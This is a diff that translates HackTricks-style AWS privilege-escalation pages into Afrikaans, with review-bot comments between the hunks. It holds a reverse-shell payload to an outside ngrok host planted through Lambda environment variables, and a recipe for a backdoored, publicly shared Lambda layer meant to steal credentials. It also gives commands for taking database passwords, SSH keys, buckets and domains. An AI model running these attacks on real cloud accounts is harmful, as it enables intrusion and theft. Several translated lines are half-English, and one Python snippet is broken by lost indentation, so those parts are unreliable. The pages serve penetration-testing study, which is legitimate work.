moontlik om omgewing veranderlikes by te voeg wat die Lambda sal laat uitvoer willekeurige kode. 
Byvoorbeeld, in python is dit moontlik om die omgewing veranderlikes `PYTHONWARNING` en `BROWSER` te misbruik om 'n python-proses willekeurige opdragte te laat uitvoer: ```bash aws --profile none-priv lambda update-function-configuration --function-name --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}" ``` - -For other scripting languages there are other env variables you can use. For more info check the subsections of scripting languages in: +Vir ander skripting tale is daar ander omgewingsveranderlikes wat jy kan gebruik. Vir meer inligting, kyk na die subafdelings van skripting tale in: {{#ref}} https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse @@ -199,19 +175,17 @@ https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalat #### RCE via Lambda Layers -[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) allows to include **code** in your lamdba function but **storing it separately**, so the function code can stay small and **several functions can share code**. - -Inside lambda you can check the paths from where python code is loaded with a function like the following: +[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) laat jou toe om **kode** in jou lambda funksie in te sluit, maar **dit apart te stoor**, sodat die funksiekode klein kan bly en **verskeie funksies kode kan deel**. +Binne lambda kan jy die paaie nagaan waarvandaan python kode gelaai word met 'n funksie soos die volgende: ```python import json import sys def lambda_handler(event, context): - print(json.dumps(sys.path, indent=2)) +print(json.dumps(sys.path, indent=2)) ``` - -These are the places: +Hierdie is die plekke: 1. /var/task 2. /opt/python/lib/python3.7/site-packages 
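Review bot: in the `@@ -147,51 +130,44 @@` hunk, the translated sentence names the variable `PYTHONWARNING`, but the command below sets `PYTHONWARNINGS`, which is the name Python actually reads; the original had the same mismatch, and since the sentence is being rewritten anyway, correct it to `PYTHONWARNINGS`. The clause 'wat die Lambda sal laat uitvoer willekeurige kode' also has English word order; 'wat die Lambda willekeurige kode sal laat uitvoer'.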
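Review bot: in the `@@ -199,19 +175,17 @@` hunk, `+print(json.dumps(sys.path, indent=2))` is dedented to column 0 under `def lambda_handler(event, context):`, which is a SyntaxError; the indentation must stay, as with the other Python blocks in this file.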
@@ -224,73 +198,61 @@ These are the places: 9. /opt/python/lib/python3.7/site-packages 10. /opt/python -For example, the library boto3 is loaded from `/var/runtime/boto3` (4th position). +Byvoorbeeld, die biblioteek boto3 word gelaai vanaf `/var/runtime/boto3` (4de posisie). -#### Exploitation +#### Exploitatie -It's possible to abuse the permission `lambda:UpdateFunctionConfiguration` to **add a new layer** to a lambda function. To execute arbitrary code this layer need to contain some **library that the lambda is going to import.** If you can read the code of the lambda, you could find this easily, also note that it might be possible that the lambda is **already using a layer** and you could **download** the layer and **add your code** in there. - -For example, lets suppose that the lambda is using the library boto3, this will create a local layer with the last version of the library: +Dit is moontlik om die toestemming `lambda:UpdateFunctionConfiguration` te misbruik om **'n nuwe laag** by 'n lambda-funksie te **voeg**. Om arbitrĂȘre kode uit te voer, moet hierdie laag 'n **biblioteek bevat wat die lambda gaan invoer.** As jy die kode van die lambda kan lees, kan jy dit maklik vind, let ook daarop dat dit moontlik is dat die lambda **reeds 'n laag gebruik** en jy kan die laag **aflaai** en **jou kode** daarby voeg. +Byvoorbeeld, kom ons neem aan dat die lambda die biblioteek boto3 gebruik, dit sal 'n plaaslike laag met die laaste weergawe van die biblioteek skep: ```bash pip3 install -t ./lambda_layer boto3 ``` +You can open `./lambda_layer/boto3/__init__.py` and **voeg die agterdeur in die globale kode by** (n funksie om akrediteerbare te exfiltreer of 'n omgekeerde skulp te kry byvoorbeeld). -You can open `./lambda_layer/boto3/__init__.py` and **add the backdoor in the global code** (a function to exfiltrate credentials or get a reverse shell for example). 
- -Then, zip that `./lambda_layer` directory and **upload the new lambda layer** in your own account (or in the victims one, but you might not have permissions for this).\ -Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **compatible with the python version** used by the lambda and if you upload it to your account, it needs to be in the **same region:** - +Then, zip that `./lambda_layer` directory and **laai die nuwe lambda-laag op** in jou eie rekening (of in die slagoffer s'n, maar jy mag dalk nie toestemming hĂȘ nie).\ +Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **kompatibel met die python weergawe** wat deur die lambda gebruik word en as jy dit na jou rekening oplaai, moet dit in die **dieselfde streek** wees: ```bash aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6" ``` - -Now, make the uploaded lambda layer **accessible by any account**: - +Nou, maak die opgelaaide lambda-laag **toeganklik vir enige rekening**: ```bash aws lambda add-layer-version-permission --layer-name boto3 \ - --version-number 1 --statement-id public \ - --action lambda:GetLayerVersion --principal * +--version-number 1 --statement-id public \ +--action lambda:GetLayerVersion --principal * ``` - -And attach the lambda layer to the victim lambda function: - +En heg die lambda-laag aan die slagoffer lambda-funksie: ```bash aws lambda update-function-configuration \ - --function-name \ - --layers arn:aws:lambda:::layer:boto3:1 \ - --timeout 300 #5min for rev shells +--function-name \ +--layers arn:aws:lambda:::layer:boto3:1 \ +--timeout 300 #5min for rev shells ``` +Die volgende stap sal wees om of **die funksie** self aan te roep as ons kan of om te wag totdat dit 
**aangeroep word** deur normale middele – wat die veiliger metode is. -The next step would be to either **invoke the function** ourselves if we can or to wait until i**t gets invoked** by normal means–which is the safer method. - -A **more stealth way to exploit this vulnerability** can be found in: +'n **Meer stealth manier om hierdie kwesbaarheid te benut** kan gevind word in: {{#ref}} ../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md {{#endref}} -**Potential Impact:** Direct privesc to the lambda service role used. +**PotensiĂ«le Impak:** Direkte privesc na die lambda diensrol wat gebruik word. ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateFunctionUrlConfig`, `lambda:InvokeFunctionUrl` -Maybe with those permissions you are able to create a function and execute it calling the URL... but I could find a way to test it, so let me know if you do! +Miskien met daardie toestemmings kan jy 'n funksie skep en dit uitvoer deur die URL aan te roep... maar ek kon nie 'n manier vind om dit te toets nie, so laat weet my as jy dit doen! 
### Lambda MitM -Some lambdas are going to be **receiving sensitive info from the users in parameters.** If get RCE in one of them, you can exfiltrate the info other users are sending to it, check it in: +Sommige lambdas gaan **sensitiewe inligting van die gebruikers in parameters ontvang.** As jy RCE in een van hulle kry, kan jy die inligting wat ander gebruikers na dit stuur, uitvange, kyk dit in: {{#ref}} ../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md {{#endref}} -## References +## Verwysings - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md index 1bf78eb3c..25935732b 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md 
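Review bot: in the `@@ -224,73 +198,61 @@` hunk, three lines are only half translated: `+You can open ./lambda_layer/boto3/__init__.py and **voeg die agterdeur in die globale kode by**`, `+Then, zip that ./lambda_layer directory and **laai die nuwe lambda-laag op**`, and `+Note that you need to create a python folder ...` keep English text outside the bold spans; translate the whole sentences. In the first of them `(n funksie` is missing the apostrophe (`('n funksie`). The heading `#### Exploitatie` is the Dutch form; Afrikaans is 'Eksploitasie', matching the 'Eksploiteer' labels used in the IAM file.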
@@ -4,112 +4,93 @@ ## Lightsail -For more information about Lightsail check: +Vir meer inligting oor Lightsail, kyk: {{#ref}} ../aws-services/aws-lightsail-enum.md {{#endref}} > [!WARNING] -> It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service. +> Dit is belangrik om te noem dat Lightsail **nie IAM rolle wat aan die gebruiker behoort gebruik nie** maar aan 'n AWS bestuurde rekening, so jy kan nie hierdie diens misbruik om privesc te doen nie. Tog, **sensitiewe data** soos kode, API sleutels en databasis inligting kan in hierdie diens gevind word. ### `lightsail:DownloadDefaultKeyPair` -This permission will allow you to get the SSH keys to access the instances: - +Hierdie toestemming sal jou toelaat om die SSH sleutels te kry om toegang tot die instansies te verkry: ``` aws lightsail download-default-key-pair ``` - -**Potential Impact:** Find sensitive info inside the instances. +**PotensiĂ«le Impak:** Vind sensitiewe inligting binne die instansies. ### `lightsail:GetInstanceAccessDetails` -This permission will allow you to generate SSH keys to access the instances: - +Hierdie toestemming sal jou toelaat om SSH-sleutels te genereer om toegang tot die instansies te verkry: ```bash aws lightsail get-instance-access-details --instance-name ``` - -**Potential Impact:** Find sensitive info inside the instances. +**PotensiĂ«le Impak:** Vind sensitiewe inligting binne die instansies. ### `lightsail:CreateBucketAccessKey` -This permission will allow you to get a key to access the bucket: - +Hierdie toestemming sal jou toelaat om 'n sleutel te kry om toegang tot die emmer te verkry: ```bash aws lightsail create-bucket-access-key --bucket-name ``` - -**Potential Impact:** Find sensitive info inside the bucket. 
+**PotensiĂ«le Impak:** Vind sensitiewe inligting binne die emmer. ### `lightsail:GetRelationalDatabaseMasterUserPassword` -This permission will allow you to get the credentials to access the database: - +Hierdie toestemming sal jou toelaat om die geloofsbriewe te verkry om toegang tot die databasis te verkry: ```bash aws lightsail get-relational-database-master-user-password --relational-database-name ``` - -**Potential Impact:** Find sensitive info inside the database. +**PotensiĂ«le Impak:** Vind sensitiewe inligting binne die databasis. ### `lightsail:UpdateRelationalDatabase` -This permission will allow you to change the password to access the database: - +Hierdie toestemming sal jou toelaat om die wagwoord te verander om toegang tot die databasis te verkry: ```bash aws lightsail update-relational-database --relational-database-name --master-user-password ``` - -If the database isn't public, you could also make it public with this permissions with - +As die databasis nie publiek is nie, kan jy dit ook publiek maak met hierdie toestemmings met ```bash aws lightsail update-relational-database --relational-database-name --publicly-accessible ``` - -**Potential Impact:** Find sensitive info inside the database. +**PotensiĂ«le Impak:** Vind sensitiewe inligting binne die databasis. ### `lightsail:OpenInstancePublicPorts` -This permission allow to open ports to the Internet - +Hierdie toestemming laat toe om poorte na die Internet te open. ```bash aws lightsail open-instance-public-ports \ - --instance-name MEAN-2 \ - --port-info fromPort=22,protocol=TCP,toPort=22 +--instance-name MEAN-2 \ +--port-info fromPort=22,protocol=TCP,toPort=22 ``` - -**Potential Impact:** Access sensitive ports. +**PotensiĂ«le Impak:** Toegang tot sensitiewe poorte. ### `lightsail:PutInstancePublicPorts` -This permission allow to open ports to the Internet. Note taht the call will close any port opened not specified on it. 
- +Hierdie toestemming laat toe om poorte na die Internet oop te maak. Let daarop dat die oproep enige poort wat nie daarop gespesifiseer is nie, sal sluit. ```bash aws lightsail put-instance-public-ports \ - --instance-name MEAN-2 \ - --port-infos fromPort=22,protocol=TCP,toPort=22 +--instance-name MEAN-2 \ +--port-infos fromPort=22,protocol=TCP,toPort=22 ``` - -**Potential Impact:** Access sensitive ports. +**PotensiĂ«le Impak:** Toegang tot sensitiewe poorte. ### `lightsail:SetResourceAccessForBucket` -This permissions allows to give an instances access to a bucket without any extra credentials - +Hierdie toestemming laat toe om 'n instansie toegang tot 'n emmer te gee sonder enige ekstra akrediteer. ```bash aws set-resource-access-for-bucket \ - --resource-name \ - --bucket-name \ - --access allow +--resource-name \ +--bucket-name \ +--access allow ``` - -**Potential Impact:** Potential new access to buckets with sensitive information. +**PotensiĂ«le Impak:** PotensiĂ«le nuwe toegang tot emmers met sensitiewe inligting. ### `lightsail:UpdateBucket` -With this permission an attacker could grant his own AWS account read access over buckets or even make the buckets public to everyone: - +Met hierdie toestemming kan 'n aanvaller sy eie AWS-rekening leestoegang oor emmers verleen of selfs die emmers publiek maak vir almal: ```bash # Grant read access to exterenal account aws update-bucket --bucket-name --readonly-access-accounts 
@@ -120,47 +101,36 @@ aws update-bucket --bucket-name --access-rules getObject=public,allowPub # Bucket private but single objects can be public aws update-bucket --bucket-name --access-rules getObject=private,allowPublicOverrides=true ``` - -**Potential Impact:** Potential new access to buckets with sensitive information. +**PotensiĂ«le Impak:** PotensiĂ«le nuwe toegang tot emmers met sensitiewe inligting. ### `lightsail:UpdateContainerService` -With this permissions an attacker could grant access to private ECRs from the containers service - +Met hierdie toestemmings kan 'n aanvaller toegang tot private ECR's van die houerdiens verleen. ```bash aws update-container-service \ - --service-name \ - --private-registry-access ecrImagePullerRole={isActive=boolean} +--service-name \ +--private-registry-access ecrImagePullerRole={isActive=boolean} ``` - -**Potential Impact:** Get sensitive information from private ECR +**PotensiĂ«le Impak:** Kry sensitiewe inligting van private ECR ### `lightsail:CreateDomainEntry` -An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address. - +'n Aanvaller met hierdie toestemming kan 'n subdomein skep en dit na sy eie IP-adres wys (subdomein oorname), of 'n SPF-record opstel wat hom toelaat om e-posse van die domein te vervals, of selfs die hoofdomein na sy eie IP-adres stel. 
```bash aws lightsail create-domain-entry \ - --domain-name example.com \ - --domain-entry name=dev.example.com,type=A,target=192.0.2.0 +--domain-name example.com \ +--domain-entry name=dev.example.com,type=A,target=192.0.2.0 ``` - -**Potential Impact:** Takeover a domain +**PotensiĂ«le Impak:** Neem 'n domein oor ### `lightsail:UpdateDomainEntry` -An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address. - +'n Aanvaller met hierdie toestemming kan 'n subdomein skep en dit na sy eie IP-adres wys (subdomein oorname), of 'n SPF-record opstel wat hom toelaat om e-posse van die domein te vervals, of selfs die hoofdomein na sy eie IP-adres stel. ```bash aws lightsail update-domain-entry \ - --domain-name example.com \ - --domain-entry name=dev.example.com,type=A,target=192.0.2.0 +--domain-name example.com \ +--domain-entry name=dev.example.com,type=A,target=192.0.2.0 ``` - -**Potential Impact:** Takeover a domain +**PotensiĂ«le Impak:** Neem 'n domein oor {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md index a1004bde6..eec19a3f1 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md 
@@ -4,26 +4,18 @@ ### `mediapackage:RotateChannelCredentials` -Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) - +Verander die Kanaal se eerste IngestEndpoint se gebruikersnaam en wagwoord. (Hierdie API is verouderd vir RotateIngestEndpointCredentials) ```bash aws mediapackage rotate-channel-credentials --id ``` - ### `mediapackage:RotateIngestEndpointCredentials` -Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) - +Verander die Kanaal se eerste IngestEndpoint se gebruikersnaam en wagwoord. (Hierdie API is verouderd vir RotateIngestEndpointCredentials) ```bash aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63 ``` - -## References +## Verwysings - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md index 80890e389..ca9069080 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md @@ -4,7 +4,7 @@ ## MQ -For more information about MQ check: +Vir meer inligting oor MQ, kyk: {{#ref}} ../aws-services/aws-mq-enum.md 
@@ -12,42 +12,32 @@ For more information about MQ check: ### `mq:ListBrokers`, `mq:CreateUser` -With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): - +Met daardie toestemmings kan jy **'n nuwe gebruiker in 'n ActimeMQ broker skep** (dit werk nie in RabbitMQ nie): ```bash aws mq list-brokers aws mq create-user --broker-id --console-access --password --username ``` - -**Potential Impact:** Access sensitive info navigating through ActiveMQ +**PotensiĂ«le Impak:** Toegang tot sensitiewe inligting deur ActiveMQ te navigeer ### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser` -With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): - +Met daardie toestemmings kan jy **'n nuwe gebruiker in 'n ActimeMQ broker skep** (dit werk nie in RabbitMQ nie): ```bash aws mq list-brokers aws mq list-users --broker-id aws mq update-user --broker-id --console-access --password --username ``` - -**Potential Impact:** Access sensitive info navigating through ActiveMQ +**PotensiĂ«le Impak:** Toegang tot sensitiewe inligting deur ActiveMQ te navigeer ### `mq:ListBrokers`, `mq:UpdateBroker` -If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**. - +As 'n broker **LDAP** vir outorisering met **ActiveMQ** gebruik. Dit is moontlik om die **konfigurasie** van die LDAP-bediener wat gebruik word, te **verander** na **een wat deur die aanvaller beheer word**. Op hierdie manier sal die aanvaller in staat wees om **alle geloofsbriewe wat deur LDAP gestuur word, te steel**. ```bash aws mq list-brokers aws mq update-broker --broker-id --ldap-server-metadata=... 
``` +As jy op een of ander manier die oorspronklike geloofsbriewe wat deur ActiveMQ gebruik is, kan vind, kan jy 'n MitM uitvoer, die geloofsbriewe steel, dit in die oorspronklike bediener gebruik, en die antwoord stuur (misschien net die gesteelde geloofsbriewe hergebruik, jy kan dit doen). -If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this). - -**Potential Impact:** Steal ActiveMQ credentials +**PotensiĂ«le Impak:** Steel ActiveMQ geloofsbriewe {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md index f0538785f..85beb09d3 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md @@ -4,7 +4,7 @@ ## MSK -For more information about MSK (Kafka) check: +Vir meer inligting oor MSK (Kafka) kyk: {{#ref}} ../aws-services/aws-msk-enum.md 
@@ -12,17 +12,11 @@ For more information about MSK (Kafka) check: ### `msk:ListClusters`, `msk:UpdateSecurity` -With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them. - +Met hierdie **privileges** en **toegang tot die VPC waar die kafka brokers is**, kan jy die **Geen outentisering** byvoeg om toegang tot hulle te verkry. ```bash aws msk --client-authentication --cluster-arn --current-version ``` - -You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\ -If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it. +Jy het toegang tot die VPC nodig omdat **jy kan nie Geen outentikasie met Kafka publiek** blootgestel aktiveer nie. As dit publiek blootgestel is, as **SASL/SCRAM** outentikasie gebruik word, kan jy **die geheim lees** om toegang te verkry (jy sal addisionele voorregte nodig hĂȘ om die geheim te lees).\ +As **IAM rol-gebaseerde outentikasie** gebruik word en **kafka publiek blootgestel** is, kan jy steeds hierdie voorregte misbruik om jou toestemmings te gee om toegang te verkry. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md index 7d43bbd3b..4d931a943 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md 
@@ -2,21 +2,17 @@ {{#include ../../../banners/hacktricks-training.md}} -## Organizations +## Organisasies -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-organizations-enum.md {{#endref}} -## From management Account to children accounts +## Van bestuurrekening na kindrekening -If you compromise the root/management account, chances are you can compromise all the children accounts.\ -To [**learn how check this page**](../#compromising-the-organization). +As jy die wortel/bestuurrekening kompromitteer, is daar 'n goeie kans dat jy al die kindrekeninge kan kompromitteer.\ +Om [**te leer hoe, kyk hierdie bladsy**](../#compromising-the-organization). {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md index b4a08093e..95493f3b9 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md @@ -2,9 +2,9 @@ {{#include ../../../banners/hacktricks-training.md}} -## RDS - Relational Database Service +## RDS - Relasionele Databasisdiens -For more information about RDS check: +Vir meer inligting oor RDS, kyk: {{#ref}} ../aws-services/aws-relational-database-rds-enum.md 
@@ -12,59 +12,54 @@ For more information about RDS check: ### `rds:ModifyDBInstance` -With that permission an attacker can **modify the password of the master user**, and the login inside the database: - +Met daardie toestemming kan 'n aanvaller **die wagwoord van die meester gebruiker verander**, en die aanmelding binne die databasis: ```bash # Get the DB username, db name and address aws rds describe-db-instances # Modify the password and wait a couple of minutes aws rds modify-db-instance \ - --db-instance-identifier \ - --master-user-password 'Llaody2f6.123' \ - --apply-immediately +--db-instance-identifier \ +--master-user-password 'Llaody2f6.123' \ +--apply-immediately # In case of postgres psql postgresql://:@:5432/ ``` - > [!WARNING] -> You will need to be able to **contact to the database** (they are usually only accessible from inside networks). +> Jy sal in staat moet wees om te **kontak met die databasis** (hulle is gewoonlik net vanaf binne-netwerke toeganklik). -**Potential Impact:** Find sensitive info inside the databases. +**PotensiĂ«le Impak:** Vind sensitiewe inligting binne die databasisse. ### rds-db:connect -According to the [**docs**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) a user with this permission could connect to the DB instance. +Volgens die [**docs**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) kan 'n gebruiker met hierdie toestemming aan die DB-instansie koppel. -### Abuse RDS Role IAM permissions +### Misbruik RDS Rol IAM toestemmings #### Postgresql (Aurora) > [!TIP] -> If running **`SELECT datname FROM pg_database;`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**. - -First you can check if this database has been used to access any other AWS service. 
You could check this looking at the installed extensions: +> As jy **`SELECT datname FROM pg_database;`** uitvoer en 'n databasis genaamd **`rdsadmin`** vind, weet jy jy is binne 'n **AWS postgresql databasis**. +Eerstens kan jy kyk of hierdie databasis gebruik is om toegang te verkry tot enige ander AWS-diens. Jy kan dit nagaan deur na die geĂŻnstalleerde uitbreidings te kyk: ```sql SELECT * FROM pg_extension; ``` +As jy iets soos **`aws_s3`** vind, kan jy aanneem dat hierdie databasis **'n soort toegang oor S3** het (daar is ander uitbreidings soos **`aws_ml`** en **`aws_lambda`**). -If you find something like **`aws_s3`** you can assume this database has **some kind of access over S3** (there are other extensions such as **`aws_ml`** and **`aws_lambda`**). - -Also, if you have permissions to run **`aws rds describe-db-clusters`** you can see there if the **cluster has any IAM Role attached** in the field **`AssociatedRoles`**. If any, you can assume that the database was **prepared to access other AWS services**. Based on the **name of the role** (or if you can get the **permissions** of the role) you could **guess** what extra access the database has. - -Now, to **read a file inside a bucket** you need to know the full path. You can read it with: +Ook, as jy toestemmings het om **`aws rds describe-db-clusters`** uit te voer, kan jy daar sien of die **kluster enige IAM Rol aangeheg het** in die veld **`AssociatedRoles`**. As daar enige is, kan jy aanneem dat die databasis **voorberei was om toegang tot ander AWS dienste** te hĂȘ. Gebaseer op die **naam van die rol** (of as jy die **toestemmings** van die rol kan kry) kan jy **raai** watter ekstra toegang die databasis het. +Nou, om **'n lĂȘer binne 'n emmer** te lees, moet jy die volle pad weet. 
Jy kan dit lees met: ```sql // Create table CREATE TABLE ttemp (col TEXT); // Create s3 uri SELECT aws_commons.create_s3_uri( - 'test1234567890678', // Name of the bucket - 'data.csv', // Name of the file - 'eu-west-1' //region of the bucket +'test1234567890678', // Name of the bucket +'data.csv', // Name of the file +'eu-west-1' //region of the bucket ) AS s3_uri \gset // Load file contents in table 
@@ -76,98 +71,81 @@ SELECT * from ttemp; // Delete table DROP TABLE ttemp; ``` - -If you had **raw AWS credentials** you could also use them to access S3 data with: - +As jy **raw AWS-akkrediteerings** gehad het, kon jy dit ook gebruik om toegang tot S3-data te verkry met: ```sql SELECT aws_s3.table_import_from_s3( - 't', '', '(format csv)', - :'s3_uri', - aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '') +'t', '', '(format csv)', +:'s3_uri', +aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '') ); ``` - > [!NOTE] -> Postgresql **doesn't need to change any parameter group variable** to be able to access S3. +> Postgresql **hoef nie enige parameter groep veranderlike te verander** om toegang tot S3 te verkry nie. #### Mysql (Aurora) > [!TIP] -> Inside a mysql, if you run the query **`SELECT User, Host FROM mysql.user;`** and there is a user called **`rdsadmin`**, you can assume you are inside an **AWS RDS mysql db**. +> Binne 'n mysql, as jy die navraag **`SELECT User, Host FROM mysql.user;`** uitvoer en daar is 'n gebruiker genaamd **`rdsadmin`**, kan jy aanneem jy is binne 'n **AWS RDS mysql db**. -Inside the mysql run **`show variables;`** and if the variables such as **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, have values, you can assume the database is prepared to access S3 data. +Binne die mysql voer **`show variables;`** uit en as die veranderlikes soos **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, waardes het, kan jy aanneem die databasis is voorberei om toegang tot S3 data te verkry. -Also, if you have permissions to run **`aws rds describe-db-clusters`** you can check if the cluster has any **associated role**, which usually means access to AWS services). - -Now, to **read a file inside a bucket** you need to know the full path. 
You can read it with: +Ook, as jy toestemmings het om **`aws rds describe-db-clusters`** uit te voer, kan jy nagaan of die kluster enige **geassosieerde rol** het, wat gewoonlik toegang tot AWS dienste beteken). +Nou, om **'n lĂȘer binne 'n emmer** te lees, moet jy die volle pad weet. Jy kan dit lees met: ```sql CREATE TABLE ttemp (col TEXT); LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col); SELECT * FROM ttemp; DROP TABLE ttemp; ``` - ### `rds:AddRoleToDBCluster`, `iam:PassRole` -An attacker with the permissions `rds:AddRoleToDBCluster` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance. - +'n Aanvaller met die toestemmings `rds:AddRoleToDBCluster` en `iam:PassRole` kan **'n gespesifiseerde rol aan 'n bestaande RDS-instantie voeg**. Dit kan die aanvaller in staat stel om **sensitiewe data te bekom** of die data binne die instantie te wysig. ```bash aws add-role-to-db-cluster --db-cluster-identifier --role-arn ``` - -**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.\ -Note that some DBs require additional configs such as Mysql, which needs to specify the role ARN in the aprameter groups also. +**PotensiĂ«le Impak**: Toegang tot sensitiewe data of ongeoorloofde wysigings aan die data in die RDS-instantie.\ +Let daarop dat sommige DB's addisionele konfigurasies vereis soos Mysql, wat die rol ARN in die parameter groepe moet spesifiseer. ### `rds:CreateDBInstance` -Just with this permission an attacker could create a **new instance inside a cluster** that already exists and has an **IAM role** attached. He won't be able to change the master user password, but he might be able to expose the new database instance to the internet: - +Net met hierdie toestemming kan 'n aanvaller 'n **nuwe instansie binne 'n kluster** wat reeds bestaan en 'n **IAM rol** aangeheg het, skep. 
Hy sal nie in staat wees om die meester gebruikerswagwoord te verander nie, maar hy mag in staat wees om die nuwe databasisinstansie aan die internet bloot te stel: ```bash aws --region eu-west-1 --profile none-priv rds create-db-instance \ - --db-instance-identifier mydbinstance2 \ - --db-instance-class db.t3.medium \ - --engine aurora-postgresql \ - --db-cluster-identifier database-1 \ - --db-security-groups "string" \ - --publicly-accessible +--db-instance-identifier mydbinstance2 \ +--db-instance-class db.t3.medium \ +--engine aurora-postgresql \ +--db-cluster-identifier database-1 \ +--db-security-groups "string" \ +--publicly-accessible ``` - ### `rds:CreateDBInstance`, `iam:PassRole` > [!NOTE] -> TODO: Test +> TODO: Toets -An attacker with the permissions `rds:CreateDBInstance` and `iam:PassRole` can **create a new RDS instance with a specified role attached**. The attacker can then potentially **access sensitive data** or modify the data within the instance. +An aanvaller met die toestemmings `rds:CreateDBInstance` en `iam:PassRole` kan **nuwe RDS-instantie met 'n spesifieke rol aangeheg**. Die aanvaller kan dan moontlik **toegang tot sensitiewe data** 